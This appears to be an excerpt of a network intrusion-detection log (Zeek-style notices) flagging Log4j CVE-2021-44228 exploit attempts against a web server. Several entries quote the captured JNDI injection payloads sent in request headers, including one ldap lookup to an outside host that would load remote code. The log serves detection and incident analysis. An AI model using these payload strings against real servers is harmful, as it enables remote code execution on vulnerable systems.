360XXXXXXXXXX.XXXXXX - - - - - 30 | XXXXXXXXXX.XXXXXX CeGxig4pTexRZwJ5O2 45.83.64.151 59322 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.64.151 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 31 | XXXXXXXXXX.XXXXXX CeGxig4pTexRZwJ5O2 45.83.64.151 59322 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='REFERER', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.64.151 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 32 | XXXXXXXXXX.XXXXXX CeGxig4pTexRZwJ5O2 45.83.64.151 59322 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='X-API-VERSION', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.64.151 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 33 | XXXXXXXXXX.XXXXXX CEWnRj1IvZOkvf79T3 45.83.67.253 58996 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.67.253 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 34 | XXXXXXXXXX.XXXXXX CEWnRj1IvZOkvf79T3 45.83.67.253 58996 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='REFERER', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.67.253 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 35 | XXXXXXXXXX.XXXXXX CEWnRj1IvZOkvf79T3 45.83.67.253 58996 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='X-API-VERSION', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.67.253 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 36 | XXXXXXXXXX.XXXXXX COud3o1XUj0YCHj5Xh 46.166.139.111 54940 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=193.3.19.159:53/c, payload_stem=193.3.19.159:53, payload_host=193.3.19.159, payload_port=53, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://193.3.19.159:53/c}' 46.166.139.111 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 37 | #close XXXX-XX-XX-XX-XX-XX 38 | --------------------------------------------------------------------------------